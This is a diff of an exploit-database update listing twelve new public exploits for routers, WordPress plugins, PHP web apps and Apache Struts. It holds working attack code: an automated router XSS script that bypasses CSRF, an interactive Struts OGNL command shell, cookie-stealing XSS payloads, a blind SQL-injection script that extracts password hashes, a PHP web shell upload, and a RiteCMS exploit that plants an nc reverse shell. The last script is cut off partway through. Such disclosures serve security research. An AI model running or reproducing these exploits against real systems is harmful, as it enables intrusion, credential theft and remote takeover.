DB: 2020-10-21

12 changes to exploits/shellcodes

Comtrend AR-5387un router - Persistent XSS (Authenticated)
Loan Management System 1.0 - Multiple Cross Site Scripting (Stored)
Wordpress Plugin WP Courses < 2.0.29 - Broken Access Controls leading to Courses Content Disclosure
Visitor Management System in PHP 1.0 - SQL Injection (Authenticated)
Ultimate Project Manager CRM PRO Version 2.0.5 - SQLi (Authenticated)
WordPress Plugin HS Brand Logo Slider 2.1 - 'logoupload' File Upload
User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS
RiteCMS 2.2.1 - Remote Code Execution (Authenticated)
Mobile Shop System v1.0 - SQL Injection Authentication Bypass
Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection
WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)

exploits/hardware/webapps/48908.py

@@ -0,0 +1,274 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+"""
+Exploit Title: Persistent XSS on Comtrend AR-5387un router
+Date: 19/10/2020
+Exploit Author: OscarAkaElvis
+Vendor Homepage: https://www.comtrend.com/
+Version: Comtrend AR-5387un router
+Tested on: Software/Firmware version A731-410JAZ-C04_R02.A2pD035g.d23i
+CVE: CVE-2018-8062
+
+Disclosure timeline:
+08/03/2018: Vulnerability was discovered
+10/03/2018: Reported to Mitre (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8062)
+11/03/2018: Mitre answered, CVE number reserved
+11/03/2018: Reported to Comtrend as part of responsible disclosure, they never answered
+16/10/2020: Two years later, reported again to Comtrend and public disclosure (https://twitter.com/OscarAkaElvis/status/1317004119509471233)
+18/10/2020: Exploit creation
+19/10/2020: Exploit sent to exploit-db
+
+Exploitation explanation:
+To exploit this vulnerability, once logged into the router, a WAN service must be created
+Click on "Advanced Setup", "WAN Service". "Add button", "Next"
+Then insert the payload into the "Enter Service Description" field. This was used for the PoC <script>alert('xss');</script>
+Then click on "Next" four times to go on through the steps and finally click on "Apply/Save"
+The result of the XSS will be displayed and triggered on the WAN services page
+
+This exploit automatize the entire process bypassing CSRF protection and allowing to set a custom XSS payload
+Happy hacking :)
+OscarAkaElvis - https://twitter.com/OscarAkaElvis
+"""
+
+# Dependencies and libraries
+import requests
+from requests.auth import HTTPBasicAuth
+import re
+from sys import argv, exit
+import argparse
+from os import path
+from time import sleep
+
+
+class Exploit(object):
+
+	# Global class vars
+	session = requests.Session()
+	user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.99 Safari/537.36"
+	ip = None
+	username = None
+	password = None
+	payload = None
+	default_ip = "192.168.1.1"
+	default_username = "admin"
+	default_password = "admin"
+	default_payload = "<script>alert('xss');</script>"
+	exploit_version = "1.0"
+	current_sessionkey = None
+	referer_sessionkey = None
+
+	script_name = path.basename(argv[0])
+	description_text = 'CVE-2018-8062 exploit by OscarAkaElvis, Persistent XSS on Comtrend AR-5387un router'
+	epilog_text = 'Examples:\n    python3 ' + script_name + ' -i 192.168.0.150\n    python3 ' + script_name + ' -u admin -p mySecureRouterP@ss\n    python3 ' + script_name + ' -i 10.0.0.1 -u admin -p mySecureRouterP@ss -x \'<script>evil_js_stuff</script>\''
+
+	def start_msg(self):
+		print("[*] Starting CVE-2018-8062 exploit...")
+		sleep(0.5)
+
+	def check_params(self, arguments):
+		parser = argparse.ArgumentParser(description=self.description_text, formatter_class=argparse.RawDescriptionHelpFormatter, epilog=self.epilog_text)
+		parser.add_argument('-i', '--ip', dest='ip', required=False, help="set router's ip", metavar='IP')
+		parser.add_argument('-u', '--username', dest='username', required=False, help="set user to login on router", metavar='USERNAME')
+		parser.add_argument('-p', '--password', dest='password', required=False, help="set password to login on router", metavar='PASSWORD')
+		parser.add_argument('-x', '--xss-payload', dest='payload', required=False, help="set xss payload", metavar='PAYLOAD')
+		parser.add_argument('-v', '--version', action='version', version=self.print_version(), help="show exploit's version number and exit")
+
+		args = parser.parse_args(arguments)
+
+		self.start_msg()
+
+		print("[*] Launch the exploit using -h argument to check all the available options")
+		print()
+
+		if not args.ip:
+			self.ip = self.default_ip
+			print("[!] Warning, no ip set, default will be used: " + str(self.ip))
+		else:
+			self.ip = args.ip
+
+		if not args.username:
+			self.username = self.default_username
+			print("[!] Warning, no username set, default will be used: " + str(self.username))
+		else:
+			self.username = args.username
+
+		if not args.password:
+			self.password = self.default_password
+			print("[!] Warning, no password set, default will be used: " + str(self.password))
+		else:
+			self.password = args.password
+
+		if not args.payload:
+			self.payload = self.default_payload
+			print("[!] Warning, no XSS payload set, PoC default will be used: " + str(self.payload))
+		else:
+			self.password = args.password
+
+	def print_version(self):
+		print()
+		return 'v{}'.format(self.exploit_version)
+
+	def check_router(self):
+		try:
+			print()
+			print("[*] Trying to detect router...")
+
+			headers = {"User-Agent": self.user_agent}
+			response = self.session.get("http://" + str(self.ip) + "/", headers=headers)
+
+			if re.match(r'.*WWW-Authenticate.*Broadband Router.*', str(response.headers)):
+				print("[+] Comtrend router detected successfully")
+			else:
+				print()
+				print("[-] It seems the target is not a Comtrend router")
+				print("[*] Exiting...")
+				exit(1)
+		except (TimeoutError, ConnectionError, requests.exceptions.ConnectionError):
+			print()
+			print("[-] Can't connect to the router")
+			print("[*] Exiting...")
+			exit(1)
+
+	def check_login(self):
+		print()
+		print("[*] Trying to login...")
+
+		headers = {"User-Agent": self.user_agent}
+		response = self.session.get("http://" + str(self.ip) + "/", headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+		if response.status_code != 401:
+			print("[+] Login successfully!")
+			sleep(1)
+		else:
+			print()
+			print("[-] Can't login into the router. Check your creds!")
+			print("[*] Exiting...")
+			exit(1)
+
+	def get_sessionKey(self, response_text):
+		sessionKey = re.search(r'.*sessionKey=([0-9]+).*', str(response_text))
+
+		if sessionKey is not None:
+			sessionKey = sessionKey.group(1)
+		else:
+			sessionKey = re.search(r'.*sessionKey=\\\'([0-9]+).*', str(response_text), re.MULTILINE)
+			if sessionKey is not None:
+				sessionKey = sessionKey.group(1)
+
+		return sessionKey
+
+	def step1(self):
+		print()
+		print("[*] Performing step 1/8. Getting initial sessionKey to bypass CSRF protection...")
+
+		headers = {"User-Agent": self.user_agent}
+		response = self.session.get("http://" + str(self.ip) + "/wancfg.cmd", headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+		self.current_sessionkey = self.get_sessionKey(response.content)
+		print("[+] Success! Initial sessionKey: " + self.current_sessionkey)
+		sleep(1)
+
+	def step2(self):
+		print()
+		print("[*] Performing step 2/8...")
+
+		paramsGet = {"sessionKey": self.current_sessionkey, "serviceId": "0"}
+		headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wancfg.cmd"}
+		response = self.session.get("http://" + str(self.ip) + "/wanifc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+		self.referer_sessionkey = self.current_sessionkey
+		self.current_sessionkey = self.get_sessionKey(response.content)
+		sleep(1)
+
+	def step3(self):
+		print()
+		print("[*] Performing step 3/8...")
+
+		paramsGet = {"sessionKey": self.current_sessionkey, "wanL2IfName": "atm0/(0_8_35)"}
+		headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wanifc.cmd?serviceId=0&sessionKey=" + self.referer_sessionkey}
+		response = self.session.get("http://" + str(self.ip) + "/wansrvc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+		self.referer_sessionkey = self.current_sessionkey
+		self.current_sessionkey = self.get_sessionKey(response.content)
+		sleep(1)
+
+	def step4(self):
+		print()
+		print("[*] Performing step 4/8...")
+
+		paramsGet = {"vlanMuxPr": "-1", "sessionKey": self.current_sessionkey, "vlanMuxId": "-1", "ntwkPrtcl": "0", "enVlanMux": "1", "enblEnetWan": "0", "serviceName": self.payload}
+		headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wansrvc.cmd?wanL2IfName=atm0/(0_8_35)&sessionKey=" + self.referer_sessionkey}
+		response = self.session.get("http://" + str(self.ip) + "/pppoe.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+		self.referer_sessionkey = self.current_sessionkey
+		self.current_sessionkey = self.get_sessionKey(response.content)
+		sleep(1)
+
+	def step5(self):
+		print()
+		print("[*] Performing step 5/8...")
+
+		paramsGet = {"useStaticIpAddress": "0", "pppLocalIpAddress": "0.0.0.0", "sessionKey": self.current_sessionkey, "enblIgmp": "0", "enblFullcone": "0", "pppTimeOut": "0", "pppAuthErrorRetry": "0", "pppServerName": "", "enblPppDebug": "0", "pppPassword": "", "enblNat": "0", "enblOnDemand": "0", "pppUserName": "", "pppIpExtension": "0", "enblFirewall": "0", "pppAuthMethod": "0", "pppToBridge": "0"}
+		headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/pppoe.cgi?enblEnetWan=0&ntwkPrtcl=0&enVlanMux=1&vlanMuxId=-1&vlanMuxPr=-1&serviceName=pppoe_0_8_35&sessionKey=" + self.referer_sessionkey}
+		response = self.session.get("http://" + str(self.ip) + "/ifcgateway.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+		self.referer_sessionkey = self.current_sessionkey
+		self.current_sessionkey = self.get_sessionKey(response.content)
+		sleep(1)
+
+	def step6(self):
+		print()
+		print("[*] Performing step 6/8...")
+
+		paramsGet = {"sessionKey": self.current_sessionkey, "defaultGatewayList": "ppp0.1"}
+		headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcgateway.cgi?pppUserName=&pppPassword=&enblOnDemand=0&pppTimeOut=0&useStaticIpAddress=0&pppLocalIpAddress=0.0.0.0&pppIpExtension=0&enblNat=0&enblFirewall=0&enblFullcone=0&pppAuthMethod=0&pppServerName=&pppAuthErrorRetry=0&enblPppDebug=0&pppToBridge=0&enblIgmp=0&sessionKey=" + self.referer_sessionkey}
+		response = self.session.get("http://" + str(self.ip) + "/ifcdns.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+		self.referer_sessionkey = self.current_sessionkey
+		self.current_sessionkey = self.get_sessionKey(response.content)
+		sleep(1)
+
+	def step7(self):
+		print()
+		print("[*] Performing step 7/8...")
+
+		paramsGet = {"dnsRefresh": "1", "sessionKey": self.current_sessionkey, "dnsPrimary": "1.1.1.1", "dnsSecondary": "8.8.8.8"}
+		headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcdns.cgi?defaultGatewayList=ppp0.1&sessionKey=" + self.referer_sessionkey}
+		response = self.session.get("http://" + str(self.ip) + "/ntwksum2.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+		self.referer_sessionkey = self.current_sessionkey
+		self.current_sessionkey = self.get_sessionKey(response.content)
+		sleep(1)
+
+	def final_step8(self):
+		print()
+		print("[*] Performing final step 8/8. Deploying XSS payload...")
+
+		paramsGet = {"sessionKey": self.current_sessionkey, "action": "add"}
+		headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ntwksum2.cgi?dnsPrimary=1.1.1.1&dnsSecondary=8.8.8.8&dnsRefresh=1&sessionKey=" + self.referer_sessionkey}
+		self.session.get("http://" + str(self.ip) + "/wancfg.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
+
+		print()
+		print("[+] XSS payload deployed successfully")
+		print("[+] Happy hacking :) . Author: OscarAkaElvis")
+
+	@staticmethod
+	def main(self, arguments):
+		self.check_params(arguments)
+		self.check_router()
+		self.check_login()
+		self.step1()
+		self.step2()
+		self.step3()
+		self.step4()
+		self.step5()
+		self.step6()
+		self.step7()
+		self.final_step8()
+		exit(0)
+
+
+if __name__ == '__main__':
+	ImportObject = Exploit()
+	ImportObject.main(ImportObject, argv[1:])

exploits/java/webapps/48917.py

@@ -0,0 +1,79 @@
+# Exploit Title: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
+# Google Dork: ext:action | filetype:action
+# Date: 2020/09/09
+# Exploit Author: Jonatas Fil
+# Vendor Homepage: http://struts.apache.org/release/2.3.x/docs/s2-016.html
+# Version: <= 2.3.15
+# Tested on: Linux
+# CVE : CVE-2013-2251
+
+#!/usr/bin/python
+#
+# coding=utf-8
+#
+# Struts 2 DefaultActionMapper Exploit [S2-016]
+# Interactive Shell for CVE-2013-2251
+#
+# The Struts 2 DefaultActionMapper supports a method for short-circuit
+navigation state changes by prefixing parameters with
+# "action:" or "redirect:", followed by a desired navigational target
+expression. This mechanism was intended to help with
+# attaching navigational information to buttons within forms.
+#
+# https://struts.apache.org/docs/s2-016.html
+# Jonatas Fil (@exploitation)
+
+import requests
+import sys
+import readline
+
+
+# Disable SSL
+requests.packages.urllib3.disable_warnings()
+
+# ShellEvil
+if len(sys.argv) == 2:
+    target = sys.argv[1] # Payload
+    first = target +
+"?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','"
+    second =
+"'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}"
+    loop = 1
+    while loop == 1:
+        cmd = raw_input("$ ")
+        while cmd.strip() == '':
+            cmd = raw_input("$ ")
+        if cmd.strip() == '\q':
+            print("Exiting...")
+            sys.exit()
+        try:
+            headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"}
+            pwn=requests.get(first+cmd+second,headers =
+headers,verify=False) # Disable SSL
+            if pwn.status_code == 200:
+                print pwn.content # 1337
+            else:
+                print("Not Vuln !")
+                sys.exit()
+        except Exception,e:
+            print e
+            print("Exiting...")
+            sys.exit()
+
+else: # BANNER
+    print('''
+ __ _          _ _   __       _ _
+/ _\ |__   ___| | | /__\_   _(_) |
+\ \| '_ \ / _ \ | |/_\ \ \ / / | |
+_\ \ | | |  __/ | //__  \ V /| | |
+\__/_| |_|\___|_|_\__/   \_/ |_|_|
+
+          by Jonatas Fil [@explotation]
+''')
+    print("======================================================")
+    print("#    Struts 2 DefaultActionMapper Exploit [S2-016]   #")
+    print("# USO: python struts.py http://site.com:8080/xxx.action #")
+    print("======================================================")
+    print("bye")
+    sys.exit()

exploits/multiple/webapps/48919.txt

@@ -0,0 +1,32 @@
+# Exploit Title: WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting Vulnerability (Authenticated)
+# Date: 10.8.2020.
+# Exploit Author: n1x_ [MS-WEB]
+# Software Homepage: https://wordpress.org/plugins/wp-colorbox/
+# Software Link (v1.1.1): https://downloads.wordpress.org/plugin/wp-colorbox.1.1.1.zip 
+# Product Version: 1.1.1
+
+[Description]
+
+# WordPress Colorbox plugin is a simple lightbox tool for WordPress. It allows users to pop up content in lightbox using the popular jQuery ColorBox library. 
+
+# Due to improper input santitization of "hyperlink" field, of the plugin shortcode, version v1.1.1 (and possibly previous versions), are affected by a stored XSS vulnerability.
+
+[Proof of Concept]
+
+# 1. Authorization as user with privileges to write and publish posts
+# 2. Injecting code into "hyperlink" field of the plugin shorthocode, and publishing the post
+# 3. The code is stored on the post
+
+
+[Example payloads]
+
+
+# Example payload 1: [wp_colorbox_media url="http://www.youtube.com/embed/example" type="youtube" hyperlink="<script>alert(document.cookie)</script>"]
+
+# Example payload 2: [wp_colorbox_media url="http://www.youtube.com/embed/example" type="youtube" hyperlink="<script>alert('sampletext')</script>"]
+
+[Response]
+
+...
+<a class="wp-colorbox-youtube" href="http://www.youtube.com/embed/example"><script>alert('sampletext')</script></a>
+...

exploits/php/webapps/48909.txt

@@ -0,0 +1,22 @@
+# Exploit Title: Loan Management System 1.0 - Multiple Cross Site Scripting (Stored)
+# Google Dork: N/A
+# Date: 2020/10/19
+# Exploit Author: Akıner Kısa
+# Vendor Homepage: https://www.sourcecodester.com/php/14471/loan-management-system-using-phpmysql-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system-using-php.zip
+# Version: 1.0
+# Tested on: XAMPP 
+# CVE : N/A
+
+Vulnerable Pages:
+
+http://localhost/loan/index.php?page=loans
+http://localhost/loan/index.php?page=payments
+http://localhost/loan/index.php?page=borrowers
+http://localhost/loan/index.php?page=loan_type
+
+Proof of Concept:
+
+1 - Go to vulnerable pages and using edit button (in the right, action column).
+
+2 - And fill the blanks with "<script>alert(1)</script>" payload.

exploits/php/webapps/48910.txt

@@ -0,0 +1,15 @@
+# Exploit Title: WP Courses < 2.0.29 - Broken Access Controls leading to 
+Courses Content Disclosure
+# Exploit Author: Stefan Broeder, Marco Ortisi (redtimmysec)
+# Authors blog: https://www.redtimmy.com
+# Vendor Homepage: https://wpcoursesplugin.com/
+# Version Vulnerable: < 2.0.29
+# CVE: (requested but not assigned yet)
+
+WP Courses plugin < 2.0.29 does not protect the courses which could be 
+accessed by unauthenticated users using the REST API (/wp-jon/) 
+endpoints (for example /wp-json/wp/v2/lesson/{lesson_id}) This could 
+result in attackers accessing paying content without authorization.
+
+Full story here: 
+https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/

exploits/php/webapps/48911.txt

@@ -0,0 +1,41 @@
+# Title: Visitor Management System in PHP 1.0 - Authenticated SQL Injection
+# Exploit Author: Rahul Ramkumar
+# Date: 2020-09-16
+# Vendor Homepage: https://projectworlds.in
+# Software Link: https://projectworlds.in/wp-content/uploads/2020/07/Visitor-Management-System-in-PHP.zip
+# Version: 1.0
+# Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1
+# CVE: CVE-2020-25760
+# Description
+The file front.php does not perform input validation on the 'rid' paramter. An attacker can append SQL queries to the input to extract sensitive information from the database.
+Note: This exploit can work pre-authentication as well, but need to change the 302 Response to 200 using an intercept tool. It should be pretty straight forward so I have not shown how.
+
+#POC
+
+1) Navigate to the login page
+
+Example:
+
+http://192.168.1.72/visitor_management/index.php
+
+2) Enter 'username' and 'password'
+
+3) On the homepage, click on any visitor name and intercept the request
+
+4) Save the request to file. Example, visitor_management_sqli.req
+
+GET /visitor_management/front.php?rid=373568 HTTP/1.1
+Host: 192.168.1.72
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Referer: http://192.168.1.72/visitor_management/front.php
+Cookie: PHPSESSID=emvdv3k52ngs7uf0gliajb13ef
+Upgrade-Insecure-Requests: 1
+
+5) Run SQLmap on the file,
+
+sqlmap -r visitor_management_sqli.req --dbms=mysql --threads=10

exploits/php/webapps/48912.py

@@ -0,0 +1,103 @@
+# Exploit Title: Ultimate Project Manager CRM PRO 2.0.5 - SQLi Credentials Leakage
+# Date: 2020-16-09
+# Exploit Author: nag0mez
+# Vendor Homepage: https://ultimatepro.codexcube.com/
+# Version: <= 2.0.5
+# Tested on: Kali Linux 2020.2
+
+
+# The SQLi injection does not allow UNION payloads. However, we can guess usernames and passwords fuzzing the database.
+
+#!/usr/bin/env python3
+#-*- coding: utf-8 -*-
+import requests
+import sys
+
+# The original vulnerability was found on a server with an invalid SSL certificate,
+# which Python could not verify. I added the verify=False parameter to avoid SSL check.
+# The lack of verification results in a warning message from Python.
+# To get a clean output, we will ignore all warnings.
+import warnings
+warnings.filterwarnings("ignore")
+
+host = 'https://testurl.test' # Change
+url = "{}/frontend/get_article_suggestion/".format(host)
+
+chars = '1234567890abcdefghijklmnopqrstuvwxyz'
+hex_chars = 'abcdef1234567890'
+
+def send_payload(payload):
+	try:
+		response = requests.post(url, data=payload, verify=False)
+		content = response.text
+		length = len(content)
+		return length
+	except Exception as e:
+		print('Cannot connect to host. Exit.')
+		sys.exit(1)
+	
+
+def get_first_user():
+	found = True
+	known = ''
+
+	while found:
+
+		found = False
+		for c in chars:
+			test = known + c
+			payload = {'search': "' or (select username from tbl_users limit 1)like'{}%'-- ".format(test)}
+			length = send_payload(payload)
+
+			if length > 2:
+				found = True
+				known += c
+				print(c, end='')
+				sys.stdout.flush()
+				break
+
+	return known
+
+def get_hash(username):
+	found = True
+	known = ''
+
+	while found:
+
+		found = False
+		for c in hex_chars:
+			test = known + c
+			payload = {'search': "' or (select password from tbl_users where username='{}' limit 1)like'{}%'-- ".format(username,test)}
+			length = send_payload(payload)
+
+			if length > 2:
+				found = True
+				known += c
+				print(c, end='')
+				sys.stdout.flush()
+				break
+
+	return known
+
+
+if __name__ == '__main__':
+	print('Exploit started.')
+	print('Guessing username...')
+
+	username = get_first_user()
+
+	if username != '':
+		print('\nUsername found: {}'.format(username))
+	else:
+		print('\nCould not get username! Exit.')
+		sys.exit(1)
+
+	print('Guessing password SHA512 hash...')
+
+	sha = get_hash(username)
+
+	if sha != '':
+		print('\nHash found: {}'.format(sha))
+	else:
+		print('\nCould not get Hash! Exit.')
+		sys.exit(1)

exploits/php/webapps/48913.txt

@@ -0,0 +1,67 @@
+# Exploit Title: WordPress Plugin HS Brand Logo Slider 2.1 - 'logoupload' File Upload
+# Date: 2020-10-20
+# Exploit Author: Net-Hunter
+# Google Dork: N/A
+# Software Link: https://ms.wordpress.org/plugins/hs-brand-logo-slider/
+# Vendor Homepage: https://www.heliossolutions.co/
+# Tested on: Linux Apache / Wordpress 5.5.1
+# Version: 2.1
+
+
+.:: Description ::.
+An Authenticated User Can Bypass Uploader of the Plugin and Upload Arbitary File
+Because the extension of the Uploaded Flie is Checked on Client Side
+
+.:: Vulnerable File ::.
+/wp-admin/admin.php?page=hs-brand-logo-slider.php 
+
+.:: Vulnerable Code ::.
+Content-Disposition: form-data; name="logoupload"; filename="a.php"
+Content-Type: image/jpeg
+<?php echo system($_GET['cmd']); ?>
+
+.:: Proof Of Concept (Poc) ::.
+Step 1 - Log in to your account , Select hs-brand-logo-slider from the menu
+Upload
+Step 2 - Stop the upload request with burp suite
+Step 3 - Rename the file, for example a.jpg to a.php
+Step 4 - Your shell has been uploaded, showing the file path in the table
+
+.:: Sample Request::.
+
+POST /wp-admin/admin.php?page=hs-brand-logo-slider.php HTTP/1.1
+Host: 172.16.1.17:81
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://172.16.1.17:81/wp-admin/admin.php?page=hs-brand-logo-slider.php
+Content-Type: multipart/form-data; boundary=---------------------------407602771734524910834293111227
+Content-Length: 81765
+Origin: http://172.16.1.17:81
+Connection: close
+Cookie: wordpress_558570ec66c8a5729fc0bd982edbc38a=admin%7C1603353703%7Ckvhq1mWuwe5MGz3wZpw8Rxi5eiJtxYMQDHzZFCkebGS%7C15d778148be9d49e48b6275e009642192e10b1d8a9e5e44a191141084f2618b6; wp-settings-time-2=1592045029; wp-settings-2=libraryContent%3Dbrowse%26editor%3Dtinymce; wp_learn_press_session_558570ec66c8a5729fc0bd982edbc38a=9c5476d130f39254b97895578a6cf9e2%7C%7C1603353694%7C%7Cd6957c27eda7a311e486866587a08500; wordpress_test_cookie=WP+Cookie+check; wordpress_lp_guest=fad4f6783283c86762dc8944423947d0; wordpress_logged_in_558570ec66c8a5729fc0bd982edbc38a=admin%7C1603353703%7Ckvhq1mWuwe5MGz3wZpw8Rxi5eiJtxYMQDHzZFCkebGS%7C80d7786798b351d10cbdfe07ba50c31d2400ccbfb173d4b90255cab42791ccd7; wp-settings-time-1=1603180907
+Upgrade-Insecure-Requests: 1
+
+-----------------------------407602771734524910834293111227
+Content-Disposition: form-data; name="brandname"
+
+aaa
+-----------------------------407602771734524910834293111227
+Content-Disposition: form-data; name="logoupload"; filename="eftekharr.php"
+Content-Type: image/jpeg
+<?php echo system($_GET['cmd']); ?>
+
+-----------------------------407602771734524910834293111227
+Content-Disposition: form-data; name="logourl"
+
+http://aa.com
+-----------------------------407602771734524910834293111227
+Content-Disposition: form-data; name="sortorder"
+
+1
+-----------------------------407602771734524910834293111227
+Content-Disposition: form-data; name="submit_data"
+
+Submit
+-----------------------------407602771734524910834293111227--

exploits/php/webapps/48914.txt

@@ -0,0 +1,27 @@
+# Exploit Title: User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS
+# Google Dork: N/A
+# Date: 2020-08-07
+# Exploit Author: yusufmalikul
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
+# Version: 2.1
+# Tested on: Windows 10
+# CVE : N/A
+
+Description
+
+User Registration & Login and User Management System With admin panel 2.1 application from PHPgurukul is vulnerable to
+Persistent XSS via the fname, lname, email, and contact field name when user register on the site then admin viewing user
+list on manage user page triggering the payload.
+
+POC
+
+User side
+1. Go to the user registration page http://localhost/loginsystem
+2. Enter <img src="x" onerror=alert(document.cookie)> in one of the field (first name, last name, email, or contact)
+3. Click sign up
+
+Admin side
+1. Login to admin panel http://localhost/loginsystem/admin
+2. After login successful it will redirect to manage user page
+3. Payload triggered

exploits/php/webapps/48915.py

@@ -0,0 +1,129 @@
+# Exploit Title: RiteCMS 2.2.1 - Authenticated Remote Code Execution
+# Date: 2020-07-03
+# Exploit Author: H0j3n
+# Vendor Homepage: http://ritecms.com/
+# Software Link: http://sourceforge.net/projects/ritecms/files/ritecms_2.2.1.zip/download
+# Version: 2.2.1
+# Tested on: Linux
+# Reference: https://www.exploit-db.com/exploits/48636
+
+# !/usr/bin/python
+# coding=utf-8
+import requests,sys,base64,os
+from colorama import Fore, Back, Style
+from requests_toolbelt.multipart.encoder import MultipartEncoder
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+# Variable
+CONTENT = '''<form action="index.php" method="post">'''
+
+# Header
+def header():
+	top = cyan('''
+ \t _____  _ _        _____ __  __  _____ 
+ \t|  __ \(_) |      / ____|  \/  |/ ____|
+ \t| |__) |_| |_ ___| |    | \  / | (___              ___    ___   ___
+ \t|  _  /| | __/ _ \ |    | |\/| |\___ \     _  __  |_  |  |_  | <  /
+ \t| | \ \| | ||  __/ |____| |  | |____) |   | |/ / / __/_ / __/_ / / 
+ \t|_|  \_\_|\__\___|\_____|_|  |_|_____/    |___/ /____(_)____(_)_/                                      
+''')
+    	return top 
+
+def info():
+	top = cyan('''
+[+] IP : {0}
+[+] USERNAME : {1}
+[+] PASSWORD : {2}
+'''.format(IP,USER,PASS))
+
+	return top
+    
+# Request Function
+# Color Function
+def cyan(STRING):
+    return Style.BRIGHT+Fore.CYAN+STRING+Fore.RESET
+    
+def red(STRING):
+    return Style.BRIGHT+Fore.RED+STRING+Fore.RESET
+
+    
+# Main    	
+if __name__ == "__main__":
+	print header()
+	print "\t--------------------------------------------------------------"
+        print "\t|  RiteCMS v2.2.1 - Authenticated Remote Code Execution      |"
+	print "\t--------------------------------------------------------------"
+	print "\t| Reference : https://www.exploit-db.com/exploits/48636      |"
+	print "\t| By        : H0j3n                                          |"
+	print "\t--------------------------------------------------------------"
+	if len(sys.argv) == 1:
+		print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0])
+		
+		print cyan("\n[-] Please Put IP & Credentials")
+		sys.exit(-1)
+	if len(sys.argv) == 2:
+		print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0])
+		
+		print cyan("\n[-] Please Put Credentials")
+		sys.exit(-1)
+	if len(sys.argv) > 3:
+		print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0])
+		
+		print cyan("\n[-] Only 2 arguments needed please see the usage!")
+		sys.exit(-1)	
+	IP = sys.argv[1]
+	USER,PASS = sys.argv[2].split(":")
+	print info()
+
+	URL='{0}/cms/index.php'.format(IP)
+	URL_UPLOAD = URL + '?mode=filemanager&action=upload&directory=media'
+
+	HEAD = {"User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"}
+	LOG_INFO = {"username" : USER, "userpw" : PASS}
+	try:
+		with requests.Session() as SESSION:
+		    SESSION.get(URL)
+		    SESSION.post(URL, data=LOG_INFO, headers=HEAD,allow_redirects=False)
+	except:
+		print red("[-] Check the URL!")
+		sys.exit(-1)		
+	if CONTENT in str(SESSION.get(URL_UPLOAD).text):
+		print red("[-] Cannot Login!")
+		sys.exit(-1)	
+	else:
+		print cyan("[+] Credentials Working!")
+	LHOST = str(raw_input("Enter LHOST : "))
+	LPORT = str(raw_input("Enter LPORT : "))
+	FILENAME = str(raw_input("Enter FileName (include.php) : "))
+	PAYLOAD = "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f'); ?>".format(LHOST,LPORT)
+	FORM_DATA = {
+	    'mode': (None,'filemanager'),
+	    'file': (FILENAME, PAYLOAD),
+	    'directory': (None, 'media'),
+	    'file_name': (None, ''),
+	    'upload_mode': (None, '1'),
+	    'resize_xy': (None, 'x'),
+	    'resize': (None, '640'),
+	    'compression': (None, '80'),
